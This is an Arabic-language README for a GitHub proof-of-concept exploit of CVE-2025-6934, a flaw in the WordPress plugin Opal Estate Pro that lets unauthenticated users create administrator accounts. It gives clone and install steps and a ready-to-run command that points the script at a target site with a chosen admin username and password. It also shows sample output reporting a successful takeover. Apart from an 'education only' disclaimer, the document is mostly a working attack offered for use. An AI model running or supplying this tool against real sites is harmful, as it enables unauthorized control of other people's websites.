
CVE-2025-6934 هو ثغرة أمنية حرجة في البرنامج المساعد ووردبريس Opal Estate Pro (الإصدار <= 1.7.5) تسمح للمهاجمين غير المصادق عليهم بإنشاء حسابات مسؤول جديدة من خلال عملية تسجيل AJAX غير الآمنة في البرنامج المساعد.
📖 الوصف يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال CVE-2025-6934، وهي ثغرة حرجة في إضافة WordPress: Opal Estate Pro <= 1.7.5، تسمح بإنشاء حساب مسؤول بدون مصادقة.
⚠️ إخلاء مسؤولية: هذه الأداة مقدمة لأغراض التعليم والبحث الأمني فقط.
لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج.
readme.txtاستنسخ المستودع وقم بتثبيت التبعيات:
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
شغّل السكربت مع هدفك:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ مثال على المخرجات:
[✔] Exploit Successful!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator

Gaurav Bhattacharjee (0xgh057r3c0n)
هذا المشروع مرخص بموجب رخصة MIT – راجع ملف LICENSE للحصول على التفاصيل.